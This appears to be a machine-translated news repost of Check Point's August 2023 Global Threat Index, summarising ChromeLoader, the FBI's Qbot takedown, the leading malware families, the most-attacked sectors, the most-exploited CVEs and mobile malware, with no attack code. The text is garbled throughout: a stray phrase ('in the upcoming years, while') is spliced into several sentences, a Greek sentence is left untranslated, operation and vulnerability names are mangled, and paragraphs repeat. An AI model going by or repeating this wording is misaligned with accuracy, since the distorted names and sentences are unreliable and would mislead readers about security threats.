Check Point Software Technologies Ltd. provider of global cybersecurity solutions, has released its Global Threat Index for August 2023. Researchers have reported a new variant of malware ChromeLoader, which targets browser users Chrome with fake ads loaded with malicious extensions.
Meanwhile, the communications sector was ranked as the second most affected industry globally, displacing healthcare from the list for the first time this year.
ChromeLoader is a persistent Google Chrome browser hijacker first discovered in 2022. It ranks 10th in last month's top malware families and is designed to secretly install bad extensions via fake ads on web browsers .
In case of the “Shampoo” campaign, victims are tricked into running VBScript files that install malicious Chrome extensions. Once installed, they can collect personal data and disrupt your browsing with unwanted ads.
In August, the FBI announced a major victory in his global campaign against him Qbot (AKA Qakbot). In "Business Duck Hunt" the FBI took control of it botnet, removed the malware from the infected devices and identified a significant number of affected devices.
The Qbot evolved into a malware delivery service used for various cybercriminal activities including attacks ransomware. It is usually spread through campaigns Phishing and collaborates with other threat actors. Although it remained the most prevalent malware in August, the Check Point noticed a significant reduction in its impact after the operation.
Last month the communications sector also ranked second as one of the most impacted industries globally, surpassing healthcare for the first time in 2023. There have been many examples of organizations in the sector facing cyberattacks this year. In March, the Chinese state cyber espionage group APT41 was observed targeting the telecommunications sector in the Middle East. Threat actors infiltrated servers microsoft Exchange with Internet access to execute commands, conduct reconnaissance, steal credentials, and perform lateral movement and data exfiltration activities.
"His downfall QBot was a breakthrough in the fight against cybercrime. However, we cannot be complacent because when one falls, another will eventually rise to take its place," said Maya Horowitz, VP Research of Check Point Software. "We should all remain vigilant, work together and continue to practice good security hygiene across all attack vectors."
Η CPR also revealed that the " Remote Code Execution HTTP Headers ” was the most commonly exploited vulnerability, affecting 40% of organizations worldwide, followed by ” Command Injection Over HTTP ” which affected 38% of organizations worldwide. THE "MVPower CCTV DVR Remote Code Execution” came in third place with a global impact of 35%.
Top malware families
*The arrows relate to the change in rank compared to the previous month.
Qbot was the most prevalent malware last month with an impact of 5% worldwide organizations, followed by Formbook with a global impact of 4%, et Fakeupdates with a global impact of 3%.
* The arrows refer to the change of the ranking in relation to the previous month.
The Qbot was the most prevalent malware last month with a 5% impact on global organizations, followed by Formbook with a global impact of 4% and the Fakeupdates with a global impact of 3%.
-
↔ Qbot - The Qbot AKA Qakbot is a multipurpose malware that first appeared in 2008. It was designed to steal a user's credentials, record keystrokes, steal cookies from browsers, spy on banking activities and develop additional malware. It is often distributed through spam Email, the Qbot uses various techniques anti-VM, anti-debugging in the upcoming years, while anti-sandbox to block analysis and avoid detection. Starting in 2022, it emerged as one of the most popular Trojans.
-
↔ Formbook - The Formbook it is one info stealer targeting the operating system Windows and was first detected in 2016. It is marketed as malware as a service (Malware as a Service - MaaS) in underground forums hacking for its powerful avoidance techniques and its relatively low price. The FormBook collects credentials from various web browsers, collects screenshots, monitors and records keystrokes, and can download and execute files as instructed by C&C of.
-
↑ Fakeupdates - The Fakeupdates (AKA SocGholish) είναι ένα πρόγραμμα λήψης γραμμένο σε JavaScript. Writes payloads to disk before launching them. The Fakeupdates led to further compromise of many other malicious programs including GootLoader, Dridex, NetSupport, DoppelPaymer in the upcoming years, while AZORult.
Top attacking industries worldwide
Last month education/research remained the number one most attacked industry globally, followed by communications and government/military.
1. Education/Research
2. Communications
3. Government / Army
Top Exploitable Vulnerabilities
Last month, the Remote -- Execution HTTP Headers ” was the most exploited vulnerability, affecting 40% of organizations worldwide, followed by ” Command Injection About HTTP ” which affected 38% of organizations worldwide. THE "MVPower CCTV DVR Remote -- Execution” was the third most frequently used vulnerability, with a global impact of 35%.
-
↑ Remote -- Execution HTTP Headers (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756) - The HTTP headers allow to client and server to pass additional information with a request HTTP. A remote attacker could use a vulnerable header HTTP to execute arbitrary code on the victim's machine.
-
↑ Command Injection About HTTP (CVE-2021-43936, CVE-2022-24086) - A command injection vulnerability has been reported via HTTP. A remote attacker can exploit this issue by sending a specially crafted request to the victim. Successful exploitation would allow an attacker to execute arbitrary code on the target machine.
-
↑ MVPower CCTV DVR Remote Code Execution (CVE-2016-20016)- A remote code execution vulnerability exists in MVPower CCTV DVR. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
Top Mobile Malwares
Last month the Anubis remained in the top spot as the most prevalent mobile malware, followed by AhMyth in the upcoming years, while SpinOk.
-
Anubis - The Anubis is a banking malware Trojan designed for mobile phones Android. Since it was first identified, it has acquired additional functions, including functions Remote access Trojan (RAT), keylogger, audio recording capabilities and various functions ransomware. It has been spotted in hundreds of different apps available on the Google Store.
-
AhMyth - The AhMyth it is one Trojan remote access (RAT) discovered in 2017. Distributed via apps Android which can be found in app stores and various websites. When a user installs one of these infected apps, the malware can collect sensitive information from the device and perform actions such as keylogging, take screenshots, send messages SMS and activating the camera, which is commonly used to steal sensitive information.
-
SpinOk - The SpinOk is a software module Android which acts as spyware. It collects information about the files stored on the devices and is able to transfer it to malicious threat actors. The malicious module found to be present in more than 100 applications Android and has been downloaded more than 421.000.000 times as of May 2023.
The Global Threat Impact Index in the upcoming years, while ThreatCloud Map of Check Point Software, based on ThreatCloud intelligence of the company, which provides real-time threat intelligence from hundreds of millions of sensors worldwide, across networks, endpoints and mobile phones. The ThreatCloud intelligence enriched with data based on AI and exclusively research data from Check Point Research, the Department Intelligence & Research of Check Point Software Technologies.
The full list of the top 10 malware families in August 2023 can be found at Check Point blog.
